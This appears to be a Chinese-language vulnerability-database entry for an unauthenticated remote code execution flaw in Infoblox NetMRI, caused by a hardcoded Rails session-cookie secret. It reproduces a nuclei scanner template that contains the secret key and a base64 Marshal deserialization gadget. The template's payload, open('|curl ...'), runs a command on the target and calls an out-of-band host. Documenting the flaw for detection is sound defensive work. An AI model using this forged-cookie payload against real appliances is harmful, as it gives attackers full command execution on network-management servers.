Infoblox NetMRI Remote Code Execution via Hardcoded Ruby Cookie Secret Key

漏洞信息

漏洞名称： Infoblox NetMRI Remote Code Execution via Hardcoded Ruby Cookie Secret Key

漏洞编号：

• CVE： CVE-2013-0156

漏洞类型： 反序列化

漏洞等级： 严重

漏洞描述： Infoblox NetMRI是一种网络管理解决方案，广泛应用于企业网络环境中，用于自动化网络配置、合规性检查和故障排除。该产品在虚拟设备上运行，为网络管理员提供强大的工具集以简化复杂的网络管理任务。由于其广泛的应用，该产品的安全性对许多组织的网络基础设施至关重要。该漏洞存在于Infoblox NetMRI虚拟设备的Rails web组件中，版本低于7.6.1的系统受到影响。漏洞的根本原因是使用了硬编码的Ruby on Rails会话cookie密钥。攻击者可以利用这一密钥构造恶意的会话cookie，当应用程序反序列化这些cookie时，会导致任意代码执行。这一漏洞与已知的Ruby on Rails反序列化漏洞（CVE-2013-0156）相关。由于Infoblox未为此问题分配新的CVE，因此它被视为底层Rails漏洞的结果。此漏洞的影响极为严重，攻击者无需认证即可远程执行任意命令，可能导致系统完全被控制。由于漏洞的利用可以自动化进行，因此风险极高。建议所有使用受影响版本的用户立即升级到7.6.1或更高版本以修复此漏洞。

产品厂商： infoblox

产品名称： netmri

影响版本： < 7.6.1

搜索语法： title:”NetMRI”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/a2f547c3ee1d773416f20a5fe1f0e25e6322ed48/http%2Fvulnerabilities%2Finfoblox%2Finfoblox-netmri-rails-cookie-rce.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: infoblox-netmri-rails-cookie-rce

info:
  name: Infoblox NetMRI < 7.6.1 - Remote Code Execution via Hardcoded Ruby Cookie Secret Key
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Infoblox NetMRI virtual appliances before version 7.6.1 are vulnerable to remote code execution (RCE) due to the use of a hardcoded Ruby on Rails session cookie secret key. The Rails web component deserializes session cookies if the signing key is valid. Attackers with knowledge of this key can craft malicious session cookies that are deserialized by the application, leading to arbitrary code execution. This vulnerability is related to the known Ruby on Rails deserialization flaw (CVE-2013-0156). Infoblox did not assign a new CVE for this issue, as it is a result of the underlying Rails vulnerability.
  impact: |
    An attacker can exploit this vulnerability to execute arbitrary commands on the NetMRI server, potentially leading to complete system compromise.
  remediation: |
    Upgrade Infoblox NetMRI to version 7.6.1 or later to mitigate this vulnerability.
  reference:
    - https://rhinosecuritylabs.com/research/infoblox-multiple-cves/
    - https://nvd.nist.gov/vuln/detail/CVE-2013-0156
  classification:
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 1
    vendor: infoblox
    product: netmri
    shodan-query: title:"NetMRI"
  tags: infoblox,netmri,rails,rce,deserialization,oast

variables:
  oast: ".{{interactsh-url}}"
  padded_oast: "{{padding(oast,'a',50,'prefix')}}"
  old_code: "b3BlbigifGN1cmwgeHh4eC4yYmVyNzQyYXVyZ3BrN2Jpc3cxY3BodWg5OGZ6M3J5Zm4ub2FzdGlmeS5jb20iKQ=="
  code1: 'open("|curl {{padded_oast}}")'
  marshal_data: '{{base64(replace(base64_decode("BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgc6CUBzcmNJInhldmFsKCdiM0JsYmlnaWZHTjFjbXdnZUhoNGVDNHlZbVZ5TnpReVlYVnlaM0JyTjJKcGMzY3hZM0JvZFdnNU9HWjZNM0o1Wm00dWIyRnpkR2xtZVM1amIyMGlLUT09Jy51bnBhY2soJ20wJykuZmlyc3QpBjoGRVQ6DEBsaW5lbm9pADoMQG1ldGhvZDoLcmVzdWx0"),old_code,base64(code1)))}}'
  signature: "{{hmac('sha1', marshal_data, 'b525fc341ce5f4d76505e7664863750f865823ba866c536e0246c195cd6cf19cc63771d6becd71c99f5beef080ac27bc3b4f72430840d83cb4efd62acb7c6dcf')}}"

http:
  - raw:
      - |
        GET /webui/gui_states/index.json HTTP/1.1
        Host: {{Hostname}}
        Cookie: _netmri={{urlencode(marshal_data)}}--{{signature}}

    matchers:
      - type: dsl
        dsl:
          - "contains(interactsh_protocol, 'dns')"
          - "status_code == 500"
        condition: and